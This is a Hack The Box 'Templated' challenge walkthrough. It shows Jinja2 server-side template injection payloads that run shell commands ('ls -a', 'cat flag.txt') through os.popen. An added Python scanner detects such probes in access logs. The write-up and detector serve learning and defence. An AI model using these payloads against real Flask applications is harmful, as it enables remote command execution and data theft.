Hack The Box — Templated Walkthrough

gizembozyel
Apr 9, 2022

Hello, today I’ll talk about the solution to the Hack The Box — Templated challenge.

First of all, this is the page that greets us. I started doing research on Flask/Jinja2, and I found out that it was affected by SSTI.
To try this, I added the {{7 * 7}} payload and saw it work.

And it worked, and we saw the reply.

For more information on SSTI with Jinja2:

https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/

Then I used this command to list the files, and I saw that there was a flag.txt.

{{request.application.__globals__.__builtins__.__import__('os').popen('ls -a').read()}}

I got the flag by reading the file.

{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}

We find our flag and complete the challenge. Keep hacking!

Practice makes perfect :)
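From the defender's side, the requests in this walkthrough leave a recognizable trail. The following is an added example, not part of the original post or the challenge's code: it flags Jinja2 template expressions in web access logs and separates arithmetic probes like {{7 * 7}} from object-traversal chains like the ones above. It assumes the payload arrives in the request URL and is logged in a combined-style access log; the log lines are constructed, and the names fully_decode, classify and scan are hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the challenge server).
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Apr/2022:10:00:01 +0000] "GET /index HTTP/1.1" 200 512',
    '10.0.0.5 - - [09/Apr/2022:10:00:07 +0000] "GET /%7B%7B7%20*%207%7D%7D HTTP/1.1" 200 79',
    '10.0.0.5 - - [09/Apr/2022:10:00:31 +0000] "GET /%7B%7Brequest.application'
    '.__globals__.__builtins__.__import__(%27os%27).popen(%27ls%20-a%27).read()'
    '%7D%7D HTTP/1.1" 200 90',
    '10.0.0.9 - - [09/Apr/2022:10:02:00 +0000] "GET /q?x=%257B%257B7*7%257D%257D HTTP/1.1" 200 80',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD) (\S+) HTTP/[\d.]+"')
EXPR_RE = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.S)  # Jinja2 {{ }} and {% %}
DUNDER_RE = re.compile(r"__\w+__")                         # __globals__, __builtins__, ...
ARITH_RE = re.compile(r"^\s*\d+\s*[*+\-]\s*\d+\s*$")       # 7 * 7 style probe


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return None, 'template-syntax', 'probe' or 'object-traversal' for one log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    verdict = None
    for braces, block in EXPR_RE.findall(fully_decode(match.group(1))):
        expr = braces or block
        if DUNDER_RE.search(expr):
            return "object-traversal"      # highest severity: stop at first hit
        verdict = "probe" if ARITH_RE.match(expr) else (verdict or "template-syntax")
    return verdict


def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := classify(line))]


if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```

A probe followed by an object-traversal request from the same client, as in the sample lines, is the sequence this walkthrough produces and is worth alerting on as a pair.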
